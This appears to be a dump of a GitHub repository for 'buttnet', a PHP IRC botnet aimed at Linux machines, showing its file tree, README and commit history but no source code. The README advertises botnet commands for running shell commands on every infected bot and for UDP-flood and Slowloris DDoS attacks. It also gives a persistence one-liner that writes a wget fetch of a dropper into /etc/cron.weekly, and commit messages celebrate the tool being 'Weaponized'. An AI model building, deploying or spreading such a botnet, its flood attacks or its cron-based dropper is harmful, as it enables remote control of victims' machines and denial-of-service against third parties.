======================: FILES :======================
buttnet
├── buttBot.php
├── buttConfCrypt.php
├── dropper.php
└── README.md

0 directories, 4 files
======================: README CONTENT :======================
# buttnet
A simple IRC Botnet for linux-based targets

##Features
###Commands
* !say `<message>`- Echos message back to channel
  * Command output is PM'd back to command issuer
* !cmd `<command>` - Runs command on all bots in channel, or bot PM'd 
* !udp `<host>` `<port | 0 for random>` `<time(s)>` - UDP flood DDoS attack
* !slowloris `<http|https://host>` `<port>` `<GET|POST>` `<threads>` `<time(s)>` - Slowloris DDoS attack [!UNDER CONSTRUCTION!]

###Dropper
Dropper allows remote persistence. Example:
* `echo "wget http://target/dropper.php" > /etc/cron.weekly/persistence.sh`

###Mutex
Lock file acts as a mutex to prevent multiple instances of the bot from running at once
====================== GIT HISTORY: ======================
dbb4071 HEAD@{0}: clone: from https://github.com/huntergregal/buttnet
commit dbb40712d11bdaa743ca4eb7251f14df293899bc
Author: Hunter Gregal <huntergregal@gmail.com>
Date:   Fri Feb 19 19:36:28 2016 -0500

    needs further work

commit 15b55a8b7db8f2b8641d92d4e9a0e8d3c469dbdd
Author: Hunter Gregal <huntergregal@gmail.com>
Date:   Fri Feb 19 16:52:19 2016 -0500

    slowloris module ready for testing

commit a60fd894210c2cef7fde084c243a81b5a60fd3aa
Author: Hunter Gregal <huntergregal@users.noreply.github.com>
Date:   Fri Feb 5 21:52:32 2016 -0500

    Update README.md

commit bd960db9321116ec828f37af4f96e74765f30270
Author: huntergregal <huntergregal@gmail.com>
Date:   Fri Feb 5 12:08:01 2016 -0500

    prepping slowloris module

commit b155e2a7dd456d92bcd386c7895e37ad16d698d8
Author: huntergregal <huntergregal@gmail.com>
Date:   Fri Feb 5 10:35:58 2016 -0500

    Removed error reporting

commit fb6b4712c0b1393dbc32ce548c4ef8643fa331db
Author: Hunter Gregal <huntergregal@gmail.com>
Date:   Thu Feb 4 19:41:15 2016 -0500

    Format

commit 465f5b22df9798b14bd8533932b1c1fa2e670fdb
Author: Hunter Gregal <huntergregal@gmail.com>
Date:   Thu Feb 4 19:40:36 2016 -0500

    :smiling_imp:Weaponized:smiling_imp:

commit 03186ce5578ca268975369e140664c2e1fbea4d6
Author: root <root@localhost.localdomain>
Date:   Thu Feb 4 19:37:17 2016 -0500

    :water:dropper complete:fire:mutex added

commit f48f75eaa643b97884b0fa5c7532158da66b496b
Merge: 6d8a30e c8e64b2
Author: huntergregal <huntergregal@gmail.com>
Date:   Wed Feb 3 16:49:20 2016 -0500

    Merge branch 'master' of https://github.com/huntergregal/buttnet

commit c8e64b2ea216b8d427e33c15d1b4ec5e923df61d
Author: root <root@localhost.localdomain>
Date:   Thu Feb 4 02:42:32 2016 -0500

    :fire:udpFlood Working:fire:

commit 8e3b2c94b641d6786001fc86748eacd822195891
Merge: 8b2df1f 61bf7f3
Author: root <root@localhost.localdomain>
Date:   Thu Feb 4 01:32:27 2016 -0500

    Merge branch 'master' of http://github.com/huntergregal/buttnet

commit 8b2df1fbcb9c08d5f8485b4088f1c070a3d3eeee
Author: root <root@localhost.localdomain>
Date:   Thu Feb 4 01:31:47 2016 -0500

    udpFlood added -- in debug

commit 61bf7f32587c5257473c156f29f4103657c5926b
Author: Hunter Gregal <huntergregal@users.noreply.github.com>
Date:   Thu Feb 4 01:25:37 2016 -0500

    Update README.md

commit 25f1ae607809f0fa7c9873b8a827cc19db31fb93
Author: Hunter Gregal <huntergregal@users.noreply.github.com>
Date:   Wed Feb 3 18:17:47 2016 -0500

    Update README.md

commit 63a7944179fa48e6aca4f0b38698622a294d3a9a
Author: Hunter Gregal <huntergregal@users.noreply.github.com>
Date:   Wed Feb 3 18:16:24 2016 -0500

    Update README.md

commit 060f859a4b9df99db5713718516d55114d282112
Author: Hunter Gregal <huntergregal@users.noreply.github.com>
Date:   Wed Feb 3 18:13:59 2016 -0500

    Update README.md

commit 6d8a30e80eafb9316b7480cde3116abad72f5bfe
Author: huntergregal <huntergregal@gmail.com>
Date:   Wed Feb 3 16:47:53 2016 -0500

    Added dropper for remote persistence

commit 69ae1cee2f9b2f05c74d3d2f6d130c51b778ce72
Author: root <root@localhost.localdomain>
Date:   Wed Feb 3 15:30:03 2016 -0500

    private msg support added

commit 9919929fc50b043e51b0552e4df639ca8dc16777
Author: root <root@localhost.localdomain>
Date:   Wed Feb 3 15:14:01 2016 -0500

    !cmd module added

commit 7a0f692516b2fc6a4dd012d9a757b15e3b9ac76d
Author: root <root@localhost.localdomain>
Date:   Wed Feb 3 13:10:30 2016 -0500

    :fire:Working:fire:

commit 58318e98afa175cfecc4d923821a1276f5e43ea8
Author: root <root@localhost.localdomain>
Date:   Wed Feb 3 11:42:06 2016 -0500

    Cleaning out trash

commit 002694f43ff5851e55425f6d194d873c86ffc420
Author: root <root@localhost.localdomain>
Date:   Wed Feb 3 11:24:58 2016 -0500

    I'm Over C. Also raw sockets require root. We PHP now

commit 7b57735f435aff97d987e246dfe7bdd4a3c445f1
Author: Hunter Gregal <huntergregal@users.noreply.github.com>
Date:   Wed Feb 3 10:34:08 2016 -0500

    Create newVersion.c

commit 0fbee7908fc8ea3a6eb611c930a3b58ff5c39641
Author: root <root@localhost.localdomain>
Date:   Wed Jan 27 23:18:48 2016 -0500

    PONG sending extra bytes

commit 2fdec444585dff6367b4097068a42286065d1430
Author: root <root@localhost.localdomain>
Date:   Thu Jan 28 23:21:19 2016 -0500

    :fire:compiles no ident

commit e57aeff91cc222200e05dd647e27888e73567d73
Author: root <root@localhost.localdomain>
Date:   Thu Jan 28 22:11:46 2016 -0500

    :fire:Looking good...

commit f7c7eaf8376e308ce421540cf3c27079363454b8
Author: root <root@localhost.localdomain>
Date:   Thu Jan 28 20:23:05 2016 -0500

    debuging

commit f05a2de4ceb7f288b0358988e8a8bad73b23f8b1
Author: root <root@localhost.localdomain>
Date:   Thu Jan 28 20:06:01 2016 -0500

    :fire:staging-dev

commit 1bfa54a7a3fed8f20f0e466451e0950053cd1d4a
Author: Hunter Gregal <huntergregal@users.noreply.github.com>
Date:   Thu Jan 28 18:35:14 2016 -0500

    Initial commit
